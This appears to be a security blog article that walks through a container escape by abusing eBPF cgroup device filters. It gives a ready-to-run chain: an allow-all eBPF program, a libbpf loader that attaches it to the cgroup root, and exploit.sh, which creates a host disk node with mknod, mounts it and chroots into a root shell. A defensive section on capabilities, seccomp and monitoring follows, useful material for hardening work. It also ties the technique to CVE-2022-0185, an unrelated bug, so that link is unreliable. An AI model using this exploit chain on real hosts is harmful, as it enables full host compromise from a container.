Background
With the widespread adoption of cloud-native technologies, container security has become a critical area of focus. eBPF (extended Berkeley Packet Filter), as a powerful technology that can run sandboxed programs in the Linux kernel, provides unprecedented observability and control, but also introduces new attack surfaces. This article explores how to use eBPF to achieve container escape, inspired by the vulnerability CVE-2022-0185.
Principle of Container Escape
The core of this container escape technique lies in abusing eBPF programs of the BPF_PROG_TYPE_CGROUP_DEVICE type. This type of program is designed to be attached to a cgroup (control group) to filter device access from processes within that cgroup.
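To make the filtering model concrete, here is a minimal user-space sketch of the decision a restrictive device filter makes. It is not taken from the original PoC: the struct and constants mirror struct bpf_cgroup_dev_ctx and the BPF_DEVCG_* values from linux/bpf.h so that it compiles without kernel headers, and the allowlist (/dev/null, /dev/zero, /dev/urandom) is a hypothetical policy chosen for illustration. A real filter would run in the kernel under SEC("cgroup/dev").

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Mirrors of the BPF_DEVCG_* constants in <linux/bpf.h> (assumed copies). */
enum { DEVCG_ACC_MKNOD = 1, DEVCG_ACC_READ = 2, DEVCG_ACC_WRITE = 4 };
enum { DEVCG_DEV_BLOCK = 1, DEVCG_DEV_CHAR = 2 };

/* Same field layout as struct bpf_cgroup_dev_ctx. */
struct dev_ctx {
    uint32_t access_type; /* (access bits << 16) | device type */
    uint32_t major;
    uint32_t minor;
};

/*
 * Hypothetical allowlist policy: permit only a few harmless character
 * devices and deny everything else, including all block devices.
 * Returns 1 to allow and 0 to deny, like a cgroup device program.
 */
int restrictive_device_filter(const struct dev_ctx *ctx)
{
    assert(ctx != NULL);

    uint32_t type = ctx->access_type & 0xFFFF;

    if (type != DEVCG_DEV_CHAR)
        return 0; /* block devices such as 8:1 are always denied */

    if (ctx->major == 1 &&
        (ctx->minor == 3 || ctx->minor == 5 || ctx->minor == 9))
        return 1; /* /dev/null, /dev/zero, /dev/urandom */

    return 0;
}

/* The policy the escape relies on: every request is allowed. */
int allow_all_filter(const struct dev_ctx *ctx)
{
    (void)ctx;
    return 1;
}
```

Under the restrictive policy, a request to mknod block device 8:1 is denied, while allow_all_filter permits it. That difference is the whole point of the technique described here.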
The workflow is as follows:
1. Loading and Attaching the BPF Program: An attacker with the CAP_BPF capability (often granted in privileged containers) can load a custom eBPF program into the kernel.
2. Bypassing Device Access Control: The attacker crafts an eBPF program that always returns 1 (allow access), effectively disabling the cgroup’s device access control mechanism.
3. Creating Host Device Nodes: With the device filter bypassed, the attacker can use the mknod system call inside the container to create a device node that corresponds to a host device, for example /dev/sda1 (a partition on the host’s hard disk).
4. Mounting the Host Device and Getting a Shell: The attacker then mounts this newly created device node to a directory within the container. If this device holds the host’s root filesystem, the attacker gains read and write access to the entire host filesystem, leading to a complete container escape and host compromise.
Constructing the PoC
To execute this attack, we need to meet the following prerequisites:
- Possession of the CAP_SYS_ADMIN and CAP_BPF capabilities. CAP_SYS_ADMIN is required for mounting, while CAP_BPF is needed to load and attach eBPF programs. These are commonly available in privileged containers.
- The ability to access the root directory of the container’s cgroup, which is necessary for attaching the eBPF program.
Below are the core code snippets for the Proof of Concept (PoC).
1. eBPF Program (bpf_prog.c)
This program is very simple. It contains a single function, bpf_allow_device_access, which always returns 1. For cgroup device programs, a return value of 1 allows the access and 0 denies it, so this program permits every device access.
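```c
#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>

/* Attach point: cgroup device filter. */
SEC("cgroup/dev")
int bpf_allow_device_access(struct bpf_cgroup_dev_ctx *ctx)
{
    /* Always allow access (1 = allow, 0 = deny) */
    return 1;
}

char _license[] SEC("license") = "GPL";
```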
2. User-space Loader Program (loader.c)
This program is responsible for loading the eBPF program into the kernel and attaching it to the cgroup.
```c
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <bpf/bpf.h>
#include <bpf/libbpf.h>

int main(int argc, char **argv) {
    if (argc != 3) {
        fprintf(stderr, "Usage: %s <bpf_file> <cgroup_path>\n", argv[0]);
        return 1;
    }

    const char *bpf_file = argv[1];
    const char *cgroup_path = argv[2];
    struct bpf_object *obj;
    struct bpf_program *prog;
    int prog_fd, cgroup_fd;

    /* Open the compiled object file and load its programs into the kernel */
    obj = bpf_object__open_file(bpf_file, NULL);
    // ... error handling ...
    bpf_object__load(obj);
    // ... error handling ...

    /* Look up the program by its C function name and get its file descriptor */
    prog = bpf_object__find_program_by_name(obj, "bpf_allow_device_access");
    prog_fd = bpf_program__fd(prog);

    /* The cgroup is identified by an open fd on its directory */
    cgroup_fd = open(cgroup_path, O_RDONLY);
    // ... error handling ...

    /* Attach to the cgroup's device hook */
    bpf_prog_attach(prog_fd, cgroup_fd, BPF_CGROUP_DEVICE, 0);
    // ... error handling ...

    printf("eBPF program attached successfully!\n");

    close(cgroup_fd);
    bpf_object__close(obj);
    return 0;
}
```
3. Attack Script (exploit.sh)
This script automates the entire attack process.
```bash
#!/bin/bash

# 1. Compile the eBPF program and the loader
clang -O2 -target bpf -c bpf_prog.c -o bpf_prog.o
clang loader.c -lbpf -o loader

# 2. Run the loader to attach the eBPF program to the cgroup root
# The cgroup path might differ based on the system
CGROUP_PATH=/sys/fs/cgroup/unified
./loader bpf_prog.o "$CGROUP_PATH"

# 3. Create a device node for the host's primary disk
mknod /tmp/host_disk b 8 1

# 4. Mount the host disk
mkdir /tmp/host_fs
mount /tmp/host_disk /tmp/host_fs

# 5. Get a root shell on the host
chroot /tmp/host_fs /bin/bash
```
PoC Code Analysis
- bpf_prog.c: The SEC("cgroup/dev") macro specifies that this is a cgroup device filter program. The kernel ensures it is attached to the correct hook point.
- loader.c: First, it opens the compiled eBPF object with bpf_object__open_file and loads it into the kernel with bpf_object__load. Then, it opens the cgroup path (e.g., /sys/fs/cgroup/unified) and uses bpf_prog_attach to attach the program to the BPF_CGROUP_DEVICE hook.
- exploit.sh: The script begins by compiling the C code. It then executes the loader to attach the eBPF program. The mknod command creates a block device file named host_disk with major number 8 and minor number 1, which typically corresponds to /dev/sda1 on the host. Finally, it mounts this device and uses chroot to gain a root shell on the host system.
Defense and Detection
To defend against and detect this type of eBPF-based container escape, consider the following measures:
1. Principle of Least Privilege: Avoid running containers with unnecessary capabilities, especially CAP_BPF and CAP_SYS_ADMIN. Do not run containers in privileged mode unless absolutely necessary.
2. Seccomp/AppArmor: Use security profiles like Seccomp or AppArmor to restrict system calls. Specifically, you can block the bpf() and mknod() system calls for containers that do not need them.
3. Monitor eBPF Program Loading: Use kernel auditing or security tools like Falco or Tetragon to monitor the loading of new eBPF programs, especially BPF_PROG_TYPE_CGROUP_DEVICE types. Alert on suspicious activity.
4. Kernel Version: Keep the host kernel updated. While this specific technique abuses a feature rather than a bug, newer kernels may introduce stricter checks or mechanisms to mitigate such abuse.
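As a starting point for the least-privilege check, the sketch below reads the effective capability mask of the current process from /proc/self/status and reports whether CAP_SYS_ADMIN (bit 21) or CAP_BPF (bit 39) is set. It is an illustrative helper, not something from the original article. The function names are hypothetical, and the bit positions are copied from linux/capability.h rather than included from it.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>

/* Capability bit numbers as defined in <linux/capability.h>. */
#define CAP_SYS_ADMIN_BIT 21
#define CAP_BPF_BIT       39

/* Returns 1 if capability number cap is set in mask, 0 otherwise. */
int cap_is_set(uint64_t mask, int cap)
{
    assert(cap >= 0 && cap < 64);
    return (int)((mask >> cap) & 1);
}

/* Parses a line such as "CapEff:\t000001ffffffffff".
 * Returns 0 and stores the mask on success, -1 for any other line. */
int parse_capeff_line(const char *line, uint64_t *mask)
{
    unsigned long long value;

    if (sscanf(line, "CapEff: %llx", &value) != 1)
        return -1;
    *mask = value;
    return 0;
}

/* Reads the effective capability mask of the calling process.
 * Returns 0 on success, -1 if /proc is unavailable or has no CapEff line. */
int read_self_capeff(uint64_t *mask)
{
    char line[256];
    int rc = -1;
    FILE *f = fopen("/proc/self/status", "r");

    if (f == NULL)
        return -1;
    while (fgets(line, sizeof line, f) != NULL) {
        if (parse_capeff_line(line, mask) == 0) {
            rc = 0;
            break;
        }
    }
    fclose(f);
    return rc;
}

/* Returns 1 if the mask holds either capability this article warns about. */
int has_risky_caps(uint64_t mask)
{
    return cap_is_set(mask, CAP_SYS_ADMIN_BIT) || cap_is_set(mask, CAP_BPF_BIT);
}
```

Running read_self_capeff followed by has_risky_caps as part of a container's startup or CI checks gives a quick signal that a workload has more privilege than it should. It is a coarse check and does not replace a proper runtime policy.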
Conclusion
eBPF is a double-edged sword. While it provides powerful capabilities for system observability and networking, it also introduces potent new attack vectors. This container escape method demonstrates how a feature designed for security (cgroup device filtering) can be subverted to compromise the host. For cloud-native environments, it is crucial to adopt a defense-in-depth strategy, combining strict permission management, runtime security monitoring, and proactive vulnerability management to ensure container and host security.
